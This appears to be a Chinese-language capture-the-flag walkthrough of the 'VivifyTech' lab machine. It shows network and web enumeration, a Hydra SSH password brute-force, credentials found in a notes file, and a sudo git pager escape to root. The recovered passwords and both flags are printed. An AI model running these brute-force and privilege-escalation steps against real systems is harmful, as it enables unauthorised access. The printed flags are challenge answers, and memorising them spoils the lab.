kali:192.168.56.104
主機發現
arp-scan -l# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:05 (Unknown: locally administered)
192.168.56.100 08:00:27:47:66:49 PCS Systemtechnik GmbH
192.168.56.111 08:00:27:87:6e:bd PCS Systemtechnik GmbH
靶機:192.168.56.111
端口掃描
nmap -p- 192.168.56.111
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
| 256 32:f3:f6:36:95:12:c8:18:f3:ad:b8:0f:04:4d:73:2f (ECDSA)
|_ 256 1d:ec:9c:6e:3c:cf:83:f6:f0:45:22:58:13:2f:d3:9e (ED25519)
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
3306/tcp open mysql MySQL (unauthorized)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
開啟了 22 80 3306 33060端口
web界面沒什么東西
掃描目錄
gobuster dir -u http://192.168.56.111 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
/index.html (Status: 200) [Size: 10701]
/index.html (Status: 200) [Size: 10701]
/server-status (Status: 403) [Size: 279]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.111/wordpress/]
原來是wp服務
添上wordpress再掃一下
gobuster dir -u http://192.168.56.111/wordpress -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
/index.php (Status: 301) [Size: 0] [--> http://192.168.56.111/wordpress/]
/index.php (Status: 301) [Size: 0] [--> http://192.168.56.111/wordpress/]
/license.txt (Status: 200) [Size: 19915]
/readme.html (Status: 200) [Size: 7399]
/wp-admin (Status: 301) [Size: 329] [--> http://192.168.56.111/wordpress/wp-admin/]
/wp-content (Status: 301) [Size: 331] [--> http://192.168.56.111/wordpress/wp-content/]
/wp-includes (Status: 301) [Size: 332] [--> http://192.168.56.111/wordpress/wp-includes/]
/wp-settings.php (Status: 500) [Size: 0]
/wp-blog-header.php (Status: 200) [Size: 0]
/wp-login.php (Status: 200) [Size: 5411]
/wp-load.php (Status: 200) [Size: 0]
/wp-links-opml.php (Status: 200) [Size: 225]
/wp-mail.php (Status: 403) [Size: 2616]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-cron.php (Status: 200) [Size: 0]
/wp-config.php (Status: 200) [Size: 0]
/wp-signup.php (Status: 302) [Size: 0] [--> http://192.168.56.111/wordpress/wp-login.php?action=register]
在wp-includes里面發現一個secret.txt可以作為一個密碼字典
wpscan掃一下用戶名
wpscan --url http://192.168.56.111/wordpress -e u[i] User(s) Identified:[+] sancelisso用戶名sancelisso
但是一個用戶名太少了,
再找點用戶名
注意到wp里面除了helloworld還有一篇文章里面有幾個人名
Sarah?Mark?Emily??Jake Alex
添加到user.txt
wpscan沒爆出來ssh也沒爆出來
把名字首字母改成小寫后爆了出來
# hydra -L user.txt -P secret.txt ssh://192.168.56.111
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-02 21:53:00
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 288 login tries (l:6/p:48), ~18 tries per task
[DATA] attacking ssh://192.168.56.111:22/
[22][ssh] host: 192.168.56.111 login: sarah password: bohicon
ssh連接拿到user權限
sarah@VivifyTech:~$ whoami
sarah
sarah@VivifyTech:~$ ls -al
total 32
drwx------ 4 sarah sarah 4096 Mar 2 08:47 .
drwxr-xr-x 6 root root 4096 Dec 5 16:00 ..
-rw------- 1 sarah sarah 0 Dec 5 17:53 .bash_history
-rw-r--r-- 1 sarah sarah 245 Dec 5 17:33 .bash_logout
-rw-r--r-- 1 sarah sarah 3565 Dec 5 17:48 .bashrc
-rw------- 1 sarah sarah 0 Mar 2 08:47 .history
drwxr-xr-x 3 sarah sarah 4096 Dec 5 16:19 .local
drwxr-xr-x 2 sarah sarah 4096 Dec 5 16:19 .private
-rw-r--r-- 1 sarah sarah 807 Dec 5 15:57 .profile
-rw-r--r-- 1 sarah sarah 27 Dec 5 16:22 user.txt
sarah@VivifyTech:~$ cat user.txt
HMV{Y0u_G07_Th15_0ne_6543}
有個.private文件夾
sarah@VivifyTech:~/.private$ ls -al
total 12
drwxr-xr-x 2 sarah sarah 4096 Dec 5 16:19 .
drwx------ 4 sarah sarah 4096 Mar 2 09:03 ..
-rw-r--r-- 1 sarah sarah 274 Dec 5 16:19 Tasks.txt
sarah@VivifyTech:~/.private$ cat T*
- Change the Design and architecture of the website
- Plan for an audit, it seems like our website is vulnerable
- Remind the team we need to schedule a party before going to holidays
- Give this cred to the new intern for some tasks assigned to him - gbodja:4Tch055ouy370N給了gbodja/4Tch055ouy370N
ssh連接
gbodja@VivifyTech:~$ whoami
gbodja
gbodja@VivifyTech:~$ sudo -l
Matching Defaults entries for gbodja on VivifyTech:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !admin_flag, use_ptyUser gbodja may run the following commands on VivifyTech:(ALL) NOPASSWD: /usr/bin/git
sudo -l發現可以git提權
直接
sudo /usr/bin/git help config
在底端輸入!/bin/bash或者!sh或者!bash拿到root權限
gbodja@VivifyTech:/usr/bin$ sudo /usr/bin/git help config
root@VivifyTech:/usr/bin# whoami
root
root@VivifyTech:/usr/bin# cd /root
root@VivifyTech:~# ls -al
total 40
drwx------ 4 root root 4096 Dec 5 17:53 .
drwxr-xr-x 18 root root 4096 Dec 5 10:10 ..
-rw------- 1 root root 1297 Dec 5 17:55 .bash_history
-rw-r--r-- 1 root root 610 Dec 5 17:43 .bashrc
-rw------- 1 root root 36 Dec 5 17:53 .lesshst
drwxr-xr-x 3 root root 4096 Dec 5 11:05 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw-r--r-- 1 root root 40 Dec 5 17:07 root.txt
drwx------ 2 root root 4096 Dec 5 10:10 .ssh
-rw-r--r-- 1 root root 168 Dec 5 10:38 .wget-hsts
root@VivifyTech:~# cat root*
HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}
(bug提問、bug描述))
)
